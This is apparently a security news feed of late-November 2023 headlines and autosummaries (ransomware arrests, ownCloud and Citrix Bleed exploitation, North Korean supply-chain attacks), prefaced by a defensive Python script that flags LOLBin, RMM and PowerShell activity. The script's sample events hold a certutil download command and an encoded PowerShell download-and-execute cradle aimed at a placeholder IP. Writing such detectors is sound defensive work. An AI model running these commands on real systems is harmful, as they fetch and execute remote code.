            Autosummary: “Malware free” attacks on the rise Attackers deployed malware in 44% of cases, but the remaining 56% of incidents included use of “living off the land” binaries (LOLBins), scripting frameworks (such as PowerShell) and remote monitoring and management (RMM) software. "
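
The Huntress numbers above name three kinds of "malware free" tradecraft: LOLBins, scripting frameworks such as PowerShell, and RMM software. As an added example (not Huntress code), the Python below classifies process-creation events into those buckets and decodes PowerShell -EncodedCommand payloads, so that a download cradle hidden in base64 is still visible to the triage rather than looking like an opaque blob. The event schema, the sample events and the indicator lists are constructed for this example and are illustrative rather than complete.

```python
"""Triage process-creation events for 'malware free' tradecraft: LOLBins,
PowerShell (including -EncodedCommand payloads) and RMM tools.
Added example; the event schema and indicator lists are this example's own."""
import base64
import re
from typing import Optional

# Illustrative indicator lists (assumptions, not a complete catalogue).
LOLBINS = {"certutil.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe",
           "bitsadmin.exe", "wmic.exe", "msiexec.exe"}
RMM_TOOLS = {"anydesk.exe", "teamviewer.exe", "screenconnect.clientservice.exe",
             "ateraagent.exe", "splashtopstreamer.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# -e / -ec / -enc / -encodedcommand followed by a base64 blob.
_ENCODED_PS = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})")
# Substrings that commonly mark a download cradle in a command line.
_DOWNLOAD_HINTS = re.compile(r"(?i)urlcache|downloadstring|downloadfile|invoke-webrequest|bitstransfer|/transfer\s")


def decode_encoded_powershell(cmdline: str) -> Optional[str]:
    """Plaintext of a PowerShell -EncodedCommand argument, or None.

    PowerShell expects base64 over UTF-16LE; anything that does not decode
    cleanly is treated as 'not an encoded command' rather than raising."""
    m = _ENCODED_PS.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def classify(event: dict) -> set[str]:
    """Tag one event; event = {"image": full path, "cmdline": str}."""
    image = event["image"].replace("/", "\\").rsplit("\\", 1)[-1].lower()
    cmdline = event.get("cmdline", "")
    tags: set[str] = set()
    if image in LOLBINS:
        tags.add("lolbin")
    if image in RMM_TOOLS:
        tags.add("rmm")
    scan_text = cmdline
    if image in POWERSHELL:
        tags.add("powershell")
        decoded = decode_encoded_powershell(cmdline)
        if decoded is not None:
            tags.add("powershell-encoded")
            scan_text = f"{cmdline} {decoded}"  # inspect the decoded script as well
    if _DOWNLOAD_HINTS.search(scan_text):
        tags.add("download-cradle")
    return tags


def triage(events: list[dict]) -> list[tuple[str, set[str]]]:
    """(image, tags) for every event that earned at least one tag."""
    return [(ev["image"], classify(ev)) for ev in events if classify(ev)]


# Constructed sample events (not real telemetry); the encoded payload is built
# here so the example is self-contained.
ENCODED_PLAINTEXT = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.20/a.ps1')"
ENCODED_ARG = base64.b64encode(ENCODED_PLAINTEXT.encode("utf-16le")).decode("ascii")
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://198.51.100.20/x.txt x.txt"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": f"powershell.exe -nop -w hidden -enc {ENCODED_ARG}"},
    {"image": r"C:\Users\Public\AnyDesk.exe", "cmdline": "AnyDesk.exe --install"},
    {"image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe notes.txt"},
]

if __name__ == "__main__":
    for image, tags in triage(SAMPLE_EVENTS):
        print(f"{image}: {', '.join(sorted(tags))}")
```

The tags are deliberately coarse: an "rmm" hit on a host where the help desk uses that tool is noise, while the same hit on a server with no RMM baseline is a lead. Join the output against an allow-list per host group before paging anyone.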


            Key Cybercriminals Behind Notorious Ransomware Families Arrested in Ukraine

            exploits ransomware ciber
            2023-11-28 https://thehackernews.com/2023/11/key-cybercriminals-behind-notorious.html
A coordinated law enforcement operation has led to the arrest of key individuals in Ukraine who are alleged to be a part of several ransomware schemes. "On 21 November, 30 properties were searched in the regions of Kyiv, Cherkasy, Rivne, and Vinnytsia, resulting in the arrest of the 32-year-old ringleader," Europol said in a statement today. "Four of the ringleader's most active accomplices were "

            Autosummary: "


            Hackers Can Exploit "Forced Authentication" to Steal Windows NTLM Tokens

            exploits
            2023-11-28 https://thehackernews.com/2023/11/hackers-can-exploit-forced.html
            Cybersecurity researchers have discovered a case of "forced authentication" that could be exploited to leak a Windows user"s NT LAN Manager (NTLM) tokens by tricking a victim into opening a specially crafted Microsoft Access file. The attack takes advantage of a legitimate feature in the database management system solution that allows users to link to external data sources, such as a remote SQL "

Autosummary: The rogue server then receives the challenge from the target NTLM server, passes it on to the victim, obtains a valid response from the victim, and forwards that response to the NTLM server as its own, completing the attacker-controlled authentication exchange. "


            Healthcare provider Ardent Health Services disclosed a ransomware attack

            exploits ransomware
            2023-11-28 https://securityaffairs.com/154855/cyber-crime/ardent-health-services-ransomware-attack.html
            The US Healthcare provider Ardent Health Services disclosed that it was the victim of a ransomware attack last week. Ardent Health Services is a healthcare company that operates hospitals and other medical facilities in the United States. It is a for-profit health system with a focus on acquiring, managing, and improving hospitals. Ardent Health Services […] "

Autosummary: By Pierluigi Paganini. "


            Slovenian power company hit by ransomware

            exploits ransomware
            2023-11-28 https://www.helpnetsecurity.com/2023/11/28/slovenian-power-company-ransomware/

            Slovenian power generation company Holding Slovenske Elektrarne (HSE) has been hit by ransomware and has had some of its data encrypted. The attack HSE is a state-owned company that controls numerous hydroelectric, thermal and coal-fired power plants. The company has declined to share any details about the cyber intrusion, but has confirmed that operation of its power plants has not been affected. “We would like to emphasize that the HSE had control over the power … More

            The post Slovenian power company hit by ransomware appeared first on Help Net Security.

            "

            Autosummary: “Threat actors leveraging Rhysida ransomware are known to impact ‘targets of opportunity,’ including victims in the education, healthcare, manufacturing, information technology, and government sectors,” according to a recently released advisory by the CISA, FBI, and MS-ISAC. "


            Cybellum achieves significant market share growth among leading medical device manufacturers

            industry
            2023-11-28 https://www.helpnetsecurity.com/2023/11/28/cybellum-medical-device-manufacturers-market-share/

Cybellum announced that it has significantly increased its market share amongst leading medical device manufacturers (MDMs). Working with companies across the industry, Cybellum’s approach provides risk visibility throughout the full product lifecycle. It also presents opportunities to manage risks so product security teams can make decisions that balance their security demands with business requirements. In today’s complex healthcare landscape with increasing regulatory oversight, medical device manufacturers are facing two main challenges. The first is managing … More

            The post Cybellum achieves significant market share growth among leading medical device manufacturers appeared first on Help Net Security.

            "

            Autosummary: "


            Dina Boluarte: Peru's president blamed for protesters' deaths

            latam
            2023-11-28 https://www.bbc.co.uk/news/world-latin-america-67553360?at_medium=RSS&at_campaign=KARANGA
            Human rights groups say dozens of demonstrators have been killed by security forces over the past year. "

            Autosummary: "


            Qilin ransomware claims attack on automotive giant Yanfeng

            exploits ransomware industry
            2023-11-28 https://www.bleepingcomputer.com/news/security/qilin-ransomware-claims-attack-on-automotive-giant-yanfeng/
            The Qilin ransomware group has claimed responsibility for a cyber attack on Yanfeng Automotive Interiors (Yanfeng), one of the world's largest automotive parts suppliers. [...] "

            Autosummary: It sells interior components to General Motors, the Volkswagen Group, Ford, Stellantis (Fiat, Chrysler, Jeep, Dodge), BMW, Daimler AG, Toyota, Honda, Nissan, and SAIC Motor. "


            DP World confirms data stolen in cyberattack, no ransomware used

            exploits ransomware ciber
            2023-11-28 https://www.bleepingcomputer.com/news/security/dp-world-confirms-data-stolen-in-cyberattack-no-ransomware-used/
            International logistics giant DP World has confirmed that data was stolen during a cyber attack that disrupted its operations in Australia earlier this month. However, no ransomware payloads or encryption were used in the attack. [...] "

            Autosummary: The Australian Cyber Security Coordinator, the Australian Cyber Security Center, the Australian Federal Police, the Department of Home Affairs, and the Office of the Australian Information Commissioner have all been informed of the situation and are working closely with DP World to lessen the impact for those who had their data stolen. "


            Hackers start exploiting critical ownCloud flaw, patch now

            exploits
            2023-11-28 https://www.bleepingcomputer.com/news/security/hackers-start-exploiting-critical-owncloud-flaw-patch-now/
            Hackers are exploiting a critical ownCloud vulnerability tracked as CVE-2023-49103 that exposes admin passwords, mail server credentials, and license keys in containerized deployments. [...] "

            Autosummary: The recommended fix is to delete the "owncloud/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php" file, disable the "phpinfo" function in Docker containers, and change potentially exposed secrets like the ownCloud admin password, mail server, database credentials, and Object-Store/S3 access keys. "


            Ransomware gangs and Living Off the Land (LOTL) attacks: A deep dive

            exploits
            2023-11-28 https://www.malwarebytes.com/blog/business/2023/11/ransomware-gangs-and-living-off-the-land-lotl-attacks-a-deep-dive
            Dive deep into the intersection of two of today's most dangerous threats. "

            Autosummary: And that’s one big reason why RaaS gangs like Lockbit, Vice Society, and ALPHV love using these attacks so much: LOTL attacks allow ransomware gangs to master the art of blending their criminal activities within normal network operations. "


            International police operation dismantled a prominent Ukraine-based Ransomware group

            exploits ransomware
            2023-11-28 https://securityaffairs.com/154897/cyber-crime/ukraine-based-ransomware-group-dismantled.html
            An international law enforcement operation dismantled the core of a ransomware group operating from Ukraine. A joint law enforcement operation led by Europol and Eurojust, with the support of the police from seven nations, has arrested in Ukraine the core members of a ransomware group. The police arrested the kingpin along with four other suspects […] "

            Autosummary: International police operation dismantled a prominent Ukraine-based Ransomware group Pierluigi Paganini November 28, 2023 An international law enforcement operation dismantled the core of a ransomware group operating from Ukraine. "


            Ransomware hackers "wreaking havoc" arrested in Ukraine

            exploits
            2023-11-28 https://www.bbc.co.uk/news/technology-67556607?at_medium=RSS&at_campaign=KARANGA
            Cyber police carry out raids to dismantle gang responsible for hacking hundreds of organisations. "

            Autosummary: "


            Google Chrome emergency update fixes 6th zero-day exploited in 2023

            exploits
            2023-11-28 https://www.bleepingcomputer.com/news/security/google-chrome-emergency-update-fixes-6th-zero-day-exploited-in-2023/
            Google has fixed the sixth Chrome zero-day vulnerability this year in an emergency security update released today to counter ongoing exploitation in attacks. [...] "

            Autosummary: Likely exploited in spyware attacks: This high-severity zero-day vulnerability stems from an integer overflow weakness within the Skia open-source 2D graphics library, posing risks ranging from crashes to the execution of arbitrary code (Skia is also used as a graphics engine by other products like ChromeOS, Android, and Flutter). "


            Threat actors started exploiting critical ownCloud flaw CVE-2023-49103

            exploits
            2023-11-28 https://securityaffairs.com/154928/hacking/owncloud-cve-2023-49103-actively-exploited.html
            Threat actors started exploiting a critical ownCloud vulnerability (CVE-2023-49103) that can lead to sensitive information disclosure. ownCloud is an open-source software platform designed for file synchronization and sharing. It allows individuals and organizations to create their own private cloud storage services, giving them control over their data while facilitating collaboration and file access across multiple […] "

            Autosummary: We are sharing ownCloud instances we see in our scans (no vuln assessment, only accessibility) in our Device Identification report https://t.co/1uPaaDBQcc Currently over 11K IPs being reported out (we are also working on adding additional fingerprints) https://t.co/kwKF6LY3i0 https://t.co/Qb2ytyJmKv pic.twitter.com/yY7g15bwSa — Shadowserver (@Shadowserver) November 27, 2023 Cybersecurity firm Onyphe downplayed the impact of the attack; it reported that only 675 IP addresses expose phpinfo() out of the 19,453 IP addresses exposed. "


            Vulnerability disclosure: Legal risks and ethical considerations for researchers

            exploits
            2023-11-27 https://www.helpnetsecurity.com/2023/11/27/eddie-zhang-project-black-vulnerability-disclosure/

            In this Help Net Security interview, Eddie Zhang, Principal Consultant at Project Black, explores the complex and often controversial world of vulnerability disclosure in cybersecurity. Zhang explores the intricate balancing act that researchers must perform when navigating the interests of various stakeholders, including the public, private companies, and government agencies. He discusses the ethical, legal, and practical implications of different disclosure strategies, ranging from full public disclosure to more discreet, coordinated approaches. The conversation also … More

            The post Vulnerability disclosure: Legal risks and ethical considerations for researchers appeared first on Help Net Security.

            "

            Autosummary: He discusses the ethical, legal, and practical implications of different disclosure strategies, ranging from full public disclosure to more discreet, coordinated approaches. How can researchers balance the interests of different stakeholders, such as the public, companies, and government agencies, when deciding on a disclosure strategy? Zhang explores the intricate balancing act that researchers must perform when navigating the interests of various stakeholders, including the public, private companies, and government agencies. Public interest: A common argument for public disclosure relates to ‘people needing to know’ that their data is being mishandled. "


            Healthcare giant Henry Schein hit twice by BlackCat ransomware

            exploits ransomware
            2023-11-27 https://www.bleepingcomputer.com/news/security/healthcare-giant-henry-schein-hit-twice-by-blackcat-ransomware/
            American healthcare company Henry Schein has reported a second cyberattack this month by the BlackCat/ALPHV ransomware gang, who also breached their network in October. [...] "

            Autosummary: "Despite ongoing discussions with Henry's team, we have not received any indication of their willingness to prioritize the security of their clients, partners, and employees, let alone protect their own network," the threat actors said. "


            Ukraine says it hacked Russian aviation agency, leaks data

            rusia-ucrania
            2023-11-27 https://www.bleepingcomputer.com/news/security/ukraine-says-it-hacked-russian-aviation-agency-leaks-data/
            Ukraine's intelligence service, operating under the Defense Ministry, claims they hacked Russia's Federal Air Transport Agency, "Rosaviatsia," to expose a purported collapse of Russia's aviation sector. [...] "

            Autosummary: "An analysis of the character of aviation incidents from the documents obtained indicates that a number of failures, especially those related to engines, landing gear, and wing mechanics, are of a systemic type." "


            Ardent hospital ERs disrupted in 6 states after ransomware attack

            exploits government ransomware
            2023-11-27 https://www.bleepingcomputer.com/news/security/ardent-hospital-ers-disrupted-in-6-states-after-ransomware-attack/
            Ardent Health Services, a healthcare provider operating 30 hospitals across five U.S. states, disclosed today that its systems were hit by a ransomware attack on Thursday. [...] "

            Autosummary: With a workforce comprising 23,000 employees, Ardent oversees operations across 30 hospitals and more than 200 care facilities in Texas, Oklahoma, New Mexico, Kansas, New Jersey, and Idaho and collaborates with over 1,400 affiliated healthcare providers spanning these six states. "


            Slovenia's largest power provider HSE hit by ransomware attack

            exploits ransomware
            2023-11-27 https://www.bleepingcomputer.com/news/security/slovenias-largest-power-provider-hse-hit-by-ransomware-attack/
            Slovenian power company Holding Slovenske Elektrarne (HSE) has suffered a ransomware attack that compromised its systems and encrypted files, yet the company says the incident did not disrupt electric power production. [...] "

            Autosummary: Founded in 2001 by the Government of Slovenia and owned by the state, the firm operates several hydroelectric, thermal, and solar power plants as well as coal mines across the country, while it also owns subsidiaries in Italy, Serbia, and Hungary. "


            The crazy world of ransomware

            exploits ransomware
            2023-11-27 https://grahamcluley.com/the-crazy-world-of-ransomware/
            Here's a bit of fun. A video of me talking for twenty minutes about ransomware - specifically some of the more bonkers stories from the world of ransomware. "

            Autosummary: "


            Bird flu kills hundreds of flamingos in Argentina

            latam
            2023-11-27 https://www.bbc.co.uk/news/world-latin-america-67509697?at_medium=RSS&at_campaign=KARANGA
            Locals have been warned not to touch the dead birds as the avian influenza virus can spread to humans. "

            Autosummary: "


            Ransomware attack on indie game maker wiped all player accounts

            exploits
            2023-11-27 https://www.bleepingcomputer.com/news/security/ransomware-attack-on-indie-game-maker-wiped-all-player-accounts/
            A ransomware attack on the "Ethyrial: Echoes of Yore" MMORPG last Friday destroyed 17,000 player accounts, deleting their in-game items and progress in the game. [...] "

            Autosummary: In January 2023, Riot Games, the creator of popular titles like "League of Legends" and "Valorant," faced a ransom demand of $10,000,000 from hackers, who threatened to release stolen source code unless the payment was made. "


            ‘Tis the season to be wary: 12 steps to ruin a cybercriminal's day

            ciber
            2023-11-27 https://www.welivesecurity.com/en/scams/tis-season-wary-ruin-cybercriminals-day/
            The holiday shopping season may be the time to splurge, but it’s also a favorite time of year for cybercriminals to target shoppers with phony deals, phishing scams and other threats. "

            Autosummary: However, clicking on the link provided in the email or text, supposedly to claim your gift card, may result in malware installation, the compromise of your personal data, or receiving a stolen card. Put simply, your money and/or your personal information, including logins to relevant accounts, which can then be sold on to others to commit identity fraud. If you haven’t heard of one before, do some research on it first – try Googling the name plus “scam” or “fraud,” and check out customer reviews, to assess its reputation. The holiday shopping season may be the time to splurge, but it’s also a favorite time of year for cybercriminals to target shoppers with phony deals, phishing scams and other threats. The holiday shopping season is in full swing. Never click on pop-up ads, even if they’re offering tremendous shopping bargains, as the ads are often malicious. "


            Lionel Messi: Inter Miami forward is "gripping" United States, says Guillem Balague

            government
            2023-11-27 https://www.bbc.co.uk/sport/football/67543580?at_medium=RSS&at_campaign=KARANGA
            Lionel Messi's arrival at Inter Miami is "gripping" the United States and improving the trajectory of MLS, writes Guillem Balague. "

            Autosummary: And if you can find a shirt - and apparently even Inter Miami co-owner David Beckham has been finding it tricky to get some to give to people as gifts - there is logically a dearth of the numbers 1 and 0 and the letters M, E, S and I. Pre Messi, Inter Miami had a stadium with plenty of empty seats. At home, his wife Antonella is helping him settle, finding things out about Miami, such as the best places to eat and enjoy, as well as honing his look and his image off the pitch. Will the arrival into Major League Soccer of Messi, regarded by many as the greatest player in the history of the game, finally burn an indelible brand into America's sports-mad psyche and establish its place alongside team sports like American football, basketball or baseball, or will it turn out to be another false dawn? With all this marked in, plus the possibility that the country could also be hosting the next Women's World Cup in 2027, it's safe to say that if football - sorry, soccer - doesn't take off in the USA after all that, then it is difficult to imagine when it ever will. In front of a capacity crowd of 20,000, including the likes of LeBron James, Serena Williams and Kim Kardashian watching on from luxury suites, he scored a stoppage time free-kick winner to seal a 2-1 win over Liga MX side Cruz Azul. That said, he has spoken more than ever, twice after a game for Apple TV, five individual interviews after the August press conference, as well as in the big presentation on his arrival. "


            Argentina election: Javier Milei"s radical proposals face test of reality

            latam
            2023-11-26 https://www.bbc.co.uk/news/world-latin-america-67509691?at_medium=RSS&at_campaign=KARANGA
            A closer look at what Argentina's president-elect has said he will do once he is in office. "

            Autosummary: "


            Week in review: LockBit exploits Citrix Bleed, Apache ActiveMQ bug exploited for cryptojacking

            exploits ransomware
            2023-11-26 https://www.helpnetsecurity.com/2023/11/26/week-in-review-lockbit-exploits-citrix-bleed-apache-activemq-bug-exploited-for-cryptojacking/

            Here’s an overview of some of last week’s most interesting news, articles, interviews and videos: PolarDNS: Open-source DNS server tailored for security evaluations PolarDNS is a specialized authoritative DNS server that allows the operator to produce custom DNS responses suitable for DNS protocol testing purposes. Open-source AV/EDR bypassing lab for training and learning Best EDR Of The Market is a user-mode endpoint detection and response (EDR) project designed to serve as a testing ground for … More

            The post Week in review: LockBit exploits Citrix Bleed, Apache ActiveMQ bug exploited for cryptojacking appeared first on Help Net Security.

            "

            Autosummary: Why boards must prioritize cybersecurity expertise: In this Help Net Security video, Graeme Payne, US Advisory Service Leader at Kudelski Security, discusses how, with the incredible number of complex threats facing modern businesses, board members must take an increased role in cybersecurity decisions – or face the consequences. "


            New "HrServ.dll" Web Shell Detected in APT Attack Targeting Afghan Government

            government
            2023-11-25 https://thehackernews.com/2023/11/new-hrservdll-web-shell-detected-in-apt.html
            An unspecified government entity in Afghanistan was targeted by a previously undocumented web shell called HrServ in what’s suspected to be an advanced persistent threat (APT) attack. The web shell, a dynamic-link library (DLL) named “hrserv.dll,” exhibits “sophisticated features such as custom encoding methods for client communication and in-memory execution,” Kaspersky security researcher Mert "

            Autosummary: "Based on the type and information within an HTTP request, specific functions are activated," Degirmenci said, adding "the GET parameters used in the hrserv.dll file, which is used to mimic Google services, include 'hl.'" This is likely an attempt by the threat actor to blend these rogue requests in network traffic and make it a lot more challenging to distinguish malicious activity from benign events. "


            Warning: 3 Critical Vulnerabilities Expose ownCloud Users to Data Breaches

            financial
            2023-11-25 https://thehackernews.com/2023/11/warning-3-critical-vulnerabilities.html
            The maintainers of the open-source file-sharing software ownCloud have warned of three critical security flaws that could be exploited to disclose sensitive information and modify files. A brief description of the vulnerabilities is as follows - Disclosure of sensitive credentials and configuration in containerized deployments impacting graphapi versions from 0.2.0 to 0.3.0. (CVSS score: 10.0) "

            Autosummary: (CVSS score: 10.0) WebDAV Api Authentication Bypass using Pre-Signed URLs impacting core versions from 10.6.0 to 10.13.0 (CVSS score: 9.8); Subdomain Validation Bypass impacting oauth2 prior to version 0.6.1 (CVSS score: 9.0). "The 'graphapi' app relies on a third-party library that provides a URL. "


            North Korea-linked APT Lazarus is using a MagicLine4NX zero-day flaw in supply chain attack

            exploits
            2023-11-25 https://securityaffairs.com/154765/apt/lazarus-magicline4nx-supply-chain-attack.html
            UK and South Korea agencies warn that North Korea-linked APT Lazarus is using a MagicLine4NX zero-day flaw in supply-chain attack The National Cyber Security Centre (NCSC) and Korea’s National Intelligence Service (NIS) released a joint warning that the North Korea-linked Lazarus hacking group is exploiting a zero-day vulnerability in the MagicLine4NX software to carry out […] "

            Autosummary: North Korea-linked APT Lazarus is using a MagicLine4NX zero-day flaw in supply chain attack Pierluigi Paganini November 25, 2023 UK and South Korea agencies warn that North Korea-linked APT Lazarus is using a MagicLine4NX zero-day flaw in supply-chain attack The National Cyber Security Centre (NCSC) and Korea’s National Intelligence Service (NIS) released a joint warning that the North Korea-linked Lazarus hacking group is exploiting a zero-day vulnerability in the MagicLine4NX software to carry out supply-chain attacks. "


            Atomic Stealer malware strikes macOS via fake browser updates

            exploits
            2023-11-25 https://www.bleepingcomputer.com/news/security/atomic-stealer-malware-strikes-macos-via-fake-browser-updates/
            The "ClearFake" fake browser update campaign has expanded to macOS, targeting Apple computers with Atomic Stealer (AMOS) malware. [...] "

            Autosummary: "


            Rhysida ransomware gang claimed China Energy hack

            exploits ransomware industry
            2023-11-25 https://securityaffairs.com/154785/cyber-crime/rhysida-ransomware-china-energy.html
            The Rhysida ransomware group claimed to have hacked the Chinese state-owned energy conglomerate China Energy Engineering Corporation. The Rhysida ransomware gang added the China Energy Engineering Corporation to the list of victims on its Tor leak site. The China Energy Engineering Corporation (CEEC) is a state-owned company in China that operates in the energy and […] "

            Autosummary: “Threat actors leveraging Rhysida ransomware are known to impact ‘targets of opportunity,’ including victims in the education, healthcare, manufacturing, information technology, and government sectors.” The ransomware gang hit organizations in multiple industries, including the education, healthcare, manufacturing, information technology, and government sectors. "


            Hamas-Linked Cyberattacks Using Rust-Powered SysJoker Backdoor Against Israel

            ciber
            2023-11-24 https://thehackernews.com/2023/11/hamas-linked-cyberattacks-using-rust.html
            Cybersecurity researchers have shed light on a Rust version of a cross-platform backdoor called SysJoker, which is assessed to have been used by a Hamas-affiliated threat actor to target Israel amid the ongoing war in the region. “Among the most prominent changes is the shift to Rust language, which indicates the malware code was entirely rewritten, while still maintaining similar "

            Autosummary: "In addition, the threat actor moved to using OneDrive instead of Google Drive to store dynamic C2 (command-and-control server) URLs." SysJoker was publicly documented by Intezer in January 2022, describing it as a backdoor capable of gathering system information and establishing contact with an attacker-controlled server by accessing a text file hosted on Google Drive that contains a hard-coded URL. "


            North Korea-linked Konni APT uses Russian-language weaponized documents

            rusia-ucrania
            2023-11-24 https://securityaffairs.com/154695/apt/konni-apt-russian-language-bait-doc.html
            North Korea-linked Konni APT group used Russian-language Microsoft Word documents to deliver malware. FortiGuard Labs researchers observed the North Korea-linked Konni APT group using a weaponized Russian-language Word document in an ongoing phishing campaign. The KONNI RAT was first spotted by Cisco Talos researchers in 2017; it had been undetected since 2014 and was employed in highly […] "

            Autosummary: North Korea-linked Konni APT uses Russian-language weaponized documents Pierluigi Paganini November 24, 2023 North Korea-linked Konni APT group used Russian-language Microsoft Word documents to deliver malware. "


            HSBC down: Thousands face mobile and online banking outages

            financial
            2023-11-24 https://www.bbc.co.uk/news/technology-67514068?at_medium=RSS&at_campaign=KARANGA
            The firm says it is "really sorry" for the problem, which comes on the busy shopping day Black Friday. "

            Autosummary: "


            Critical bug in ownCloud file sharing app exposes admin passwords

            exploits
            2023-11-24 https://www.bleepingcomputer.com/news/security/critical-bug-in-owncloud-file-sharing-app-exposes-admin-passwords/
            Open source file sharing software ownCloud is warning of three critical-severity security vulnerabilities, including one that can expose administrator passwords and mail server credentials. [...] "

            Autosummary: The recommended fix is to delete the "owncloud/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php" file, disable the "phpinfo" function in Docker containers, and change potentially exposed secrets like the ownCloud admin password, mail server, database credentials, and Object-Store/S3 access keys. "


            UK and South Korea: Hackers use zero-day in supply-chain attack

            exploits
            2023-11-24 https://www.bleepingcomputer.com/news/security/uk-and-south-korea-hackers-use-zero-day-in-supply-chain-attack/
            A joint advisory by the National Cyber Security Centre (NCSC) and Korea's National Intelligence Service (NIS) discloses a supply-chain attack executed by North Korean hackers involving the MagicLine [...] The National Cyber Security Centre (NCSC) and Korea's National Intelligence Service (NIS) warn that the North Korean Lazarus hacking grou [...] "

            Autosummary: In March 2023, it was discovered that "Labyrinth Chollima," a subgroup of Lazarus, conducted a supply chain attack against VoIP software maker 3CX to breach multiple high-profile companies worldwide. "


            Cyberattack on IT provider CTS impacts dozens of UK law firms

            ciber
            2023-11-24 https://www.bleepingcomputer.com/news/security/cyberattack-on-it-provider-cts-impacts-dozens-of-uk-law-firms/
            A cyberattack on CTS, a leading managed service provider (MSP) for law firms and other organizations in the UK legal sector, is behind a major outage impacting numerous law firms and home buyers in the country since Wednesday. [...] "

            Autosummary: O'Neil Patient, one of CTS' clients, told Property Industry Eye that the outage "is impacting a number of organisations across the sector, as our provider is a specialist in secure legal systems for many law firms and barrister's chambers. "


            Cybercriminals Using Telekopye Telegram Bot to Craft Phishing Scams on a Grand Scale

            financial ciber
            2023-11-24 https://thehackernews.com/2023/11/cybercriminals-using-telekopye-telegram.html
            More details have emerged about a malicious Telegram bot called Telekopye that's used by threat actors to pull off large-scale phishing scams. "Telekopye can craft phishing websites, emails, SMS messages, and more," ESET security researcher Radek Jizba said in a new analysis. The threat actors behind the operation – codenamed Neanderthals – are known to run the criminal enterprise as a "

            Autosummary: Choosing a Mammoth for a buyer scam is a deliberate process that takes into account the victim's gender, age, experience in online marketplaces, rating, reviews, number of completed trades, and the type of items they are selling, indicating a preparatory stage that involves extensive market research. "


            Citrix Bleed widely exploited, warn government agencies

            exploits government
            2023-11-24 https://www.malwarebytes.com/blog/news/2023/11/citrix-bleed-widely-exploitated-warn-government-agencies
            Citrix Bleed is being actively exploited by at least six cybercrime groups. "

            Autosummary: The following supported versions of NetScaler ADC and NetScaler Gateway are affected by the vulnerability: NetScaler ADC and NetScaler Gateway 14.1 before 14.1-8.50; NetScaler ADC and NetScaler Gateway 13.1 before 13.1-49.15; NetScaler ADC and NetScaler Gateway 13.0 before 13.0-92.19; NetScaler ADC 13.1-FIPS before 13.1-37.164; NetScaler ADC 12.1-FIPS before 12.1-55.300; NetScaler ADC 12.1-NDcPP before 12.1-55.300. NetScaler ADC and NetScaler Gateway version 12.1 are now End-of-Life (EOL) and also vulnerable. The advisory provides Tactics, Techniques and Procedures (TTPs) and Indicators of Compromise (IoCs) obtained from FBI, the Australian Cyber Security Centre (ACSC), and voluntarily shared by Boeing. "


            Cybercriminals turn to ready-made bots for quick attacks

            ciber
            2023-11-23 https://www.helpnetsecurity.com/2023/11/23/bot-attacks-h1-2023/

            Bots and human fraud farms were responsible for billions of attacks in H1 2023 and into Q3, according to Arkose Labs. These attacks comprised 73% of all website and app traffic measured. In other words, almost three-quarters of traffic to digital properties is malicious. Researchers assessed the attacks across three primary attack vectors: basic bots, intelligent bots, and human fraud farms. Fraudsters use these vectors to launch attack types such as SMS toll … More

            The post Cybercriminals turn to ready-made bots for quick attacks appeared first on Help Net Security.

            "

            Autosummary: Bad actors were attempting to drain account balances through ATO attacks, while online fake accounts were most likely the preferred methods to launder illicit proceeds gained from real-world crimes like human trafficking, drug dealing, or weapon sales. Fraudsters use these vectors to launch attack types such as SMS toll fraud, web scraping, card testing, credential stuffing, and more. "


            North Korean Hackers Distribute Trojanized CyberLink Software in Supply Chain Attack

            exploits
            2023-11-23 https://thehackernews.com/2023/11/north-korean-hackers-distribute.html
            A North Korean state-sponsored threat actor tracked as Diamond Sleet is distributing a trojanized version of a legitimate application developed by a Taiwanese multimedia software developer called CyberLink to target downstream customers via a supply chain attack. "This malicious file is a legitimate CyberLink application installer that has been modified to include malicious code that downloads, "

            Autosummary: "This malicious file is a legitimate CyberLink application installer that has been modified to include malicious code that downloads, decrypts, and loads a second-stage payload," the Microsoft Threat Intelligence team said in an analysis on Wednesday. "


            6 Steps to Accelerate Cybersecurity Incident Response

            ciber
            2023-11-23 https://thehackernews.com/2023/11/6-steps-to-accelerate-cybersecurity.html
            Modern security tools continue to improve in their ability to defend organizations’ networks and endpoints against cybercriminals. But the bad actors still occasionally find a way in. Security teams must be able to stop threats and restore normal operations as quickly as possible. That’s why it’s essential that these teams not only have the right tools but also understand how to effectively "

            Autosummary: Leveraging a templated incident response plan to establish roles and responsibilities for all participants — security leaders, operations managers, help desk teams, identity and access managers, as well as audit, compliance, communications, and executives — can ensure efficient coordination. Bonus step: Investigation. Goal: Determine who, what, when, where, why, how. During the identification phase, you will document all indicators of compromise (IOCs) gathered from alerts, such as compromised hosts and users, malicious files and processes, new registry keys, and more. This isn't always possible, however, so you may need to take measures like patching, changing passwords, killing specific services, and more. With the containment phase complete, you can move to eradication, which can be handled through either disk cleaning, restoring to a clean backup, or full disk reimaging. Now that the incident is comfortably behind you, it's time to reflect on each major IR step and answer key questions; there are plenty of questions and aspects that should be asked and reviewed, and below are a few examples: Identification: How long did it take to detect the incident after the initial compromise occurred? Short-term: This includes steps you might take in the moment, like shutting down systems, disconnecting devices from the network, and actively observing the threat actor's activities. Also, using an endpoint detection and response (EDR) platform or extended detection and response (XDR) tool with centralized control will let you quickly take defensive actions like isolating machines, disconnecting them from the network, and executing counteracting commands at scale. "


            Mirai-based Botnet Exploiting Zero-Day Bugs in Routers and NVRs for Massive DDoS Attacks

            exploits
            2023-11-23 https://thehackernews.com/2023/11/mirai-based-botnet-exploiting-zero-day.html
            An active malware campaign is leveraging two zero-day vulnerabilities with remote code execution (RCE) functionality to rope routers and video recorders into a Mirai-based distributed denial-of-service (DDoS) botnet. “The payload targets routers and network video recorder (NVR) devices with default admin credentials and installs Mirai variants when successful,” Akamai said in an advisory "

